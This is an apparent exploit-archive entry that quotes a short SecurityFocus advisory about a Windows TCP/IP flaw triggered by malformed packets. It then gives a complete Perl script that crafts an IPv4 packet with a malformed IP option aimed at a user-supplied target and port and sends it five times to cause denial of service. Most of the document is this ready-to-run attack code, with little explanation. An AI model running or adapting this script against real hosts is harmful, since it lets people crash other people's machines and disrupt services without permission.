30 lines
No EOL
805 B
Perl
Executable file
30 lines
No EOL
805 B
Perl
Executable file
source: https://www.securityfocus.com/bid/13116/info
|
|
|
|
Microsoft Windows is reported prone to a remote code execution vulnerability. It is reported that the vulnerability manifests when an affected Microsoft platform receives and processes an especially malformed TCP/IP packet.
|
|
|
|
Reports indicate that the immediate consequences of exploitation of this issue are a denial of service.
|
|
|
|
#!/usr/bin/perl
|
|
use strict;
|
|
use warnings;
|
|
|
|
my %opts;
|
|
use Getopt::Std;
|
|
getopts('t:p:', \%opts);
|
|
die("Usage: $0 -t TARGET -p PORT\n") unless $opts{t} && $opts{p};
|
|
|
|
use Net::Pkt;
|
|
|
|
$Env->debug(3);
|
|
|
|
my $frame = Net::Packet::Frame->new(
|
|
l3 => Net::Packet::IPv4->new(
|
|
dst => $opts{t},
|
|
options => "\x03\x27". 'G'x38,
|
|
),
|
|
l4 => Net::Packet::TCP->new(
|
|
dst => $opts{p},
|
|
),
|
|
);
|
|
|
|
$frame->send for 1..5; |